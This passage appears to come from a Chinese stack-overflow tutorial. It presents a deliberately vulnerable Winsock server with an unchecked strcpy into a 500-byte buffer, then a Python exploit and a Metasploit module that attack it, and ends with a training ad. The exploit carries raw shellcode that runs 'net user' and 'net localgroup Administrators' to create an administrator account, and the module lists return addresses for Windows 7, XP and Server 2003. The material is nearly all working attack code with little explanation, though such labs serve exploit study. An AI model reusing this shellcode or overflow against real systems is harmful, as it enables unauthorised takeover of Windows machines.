/************************************************************
** Author: www.netfairy.net
** Time: 7-28-2015
** 注意: 为了简便,我省略了错误处理
************************************************************/
#include<stdio.h>
#include<winsock2.h>
#include<stdlib.h>
#pragma comment(lib,"ws2_32.lib")
void test( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
int main()
{
WSADATA wsadata;
WORD word=MAKEWORD(2,2);//定义字socket版本
if(WSAStartup(word,&wsadata)!=0)//初始化socket
{
printf("failed to load winsock!");
return 0;
}
SOCKET listensocket,acceptsocket;//定义两个套接字
listensocket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);//建立socket
if(listensocket==INVALID_SOCKET)
{
printf("socket()failed:%d\n",WSAGetLastError());
return 0;
}
struct sockaddr_in server,client;//定义地址结构
server.sin_family=AF_INET;
server.sin_port=htons(8888);
server.sin_addr.s_addr=inet_addr("127.0.0.1");
if(bind(listensocket,(sockaddr *)&server,sizeof(server))==SOCKET_ERROR)//绑定套接字
{
printf("bind() failed:%d\n",GetLastError());
return 0;
}
if(listen(listensocket,5)==SOCKET_ERROR)//将套接字置于监听状态
{
printf("listen() failed:%d\n",GetLastError());
return 0;
}
printf("服务器启动成功,等待来自客户端的消息!\n");
while(1)//循环接收客户端连接
{
int n=sizeof(client);
acceptsocket=accept(listensocket,(SOCKADDR *)&client,&n);//接受连接
if(acceptsocket==INVALID_SOCKET)
{
printf("accept() failed:%d\n",GetLastError());
break;
}
else
{
while(1)
{
char recvbuf[5000];
recv(acceptsocket,recvbuf,5000,0); //接收来自客户端的消息
printf("来自客户端的消息:%s\n",recvbuf);
test(recvbuf);
}
}
}
closesocket(acceptsocket);
closesocket(listensocket);
WSACleanup();
return 0;
}
500个字节填充物+jmp/call esp地址+shellcode
import socket
testfile=open("C:\\Users\\Administrator\\Desktop\\test.txt",'r')
testdata=testfile.read() //此时test.txt为空文件
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8888))
testdata=testdata+"A"*500+"\x43\xbf\xcd\x77"+"\x90"*20+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"
s.send(testdata)
testfile.close() #关闭文件
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Netfairy' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 7',
{ 'Ret' => 0x77cdbf43, 'Offset' => 500 } ],
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 500} ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 500} ],
],
'DefaultTarget' => 0,
'Privileged' => false
))
register_options(
[
Opt::RPORT(8888)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
show exploits
use windows/wins/Netfairy
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
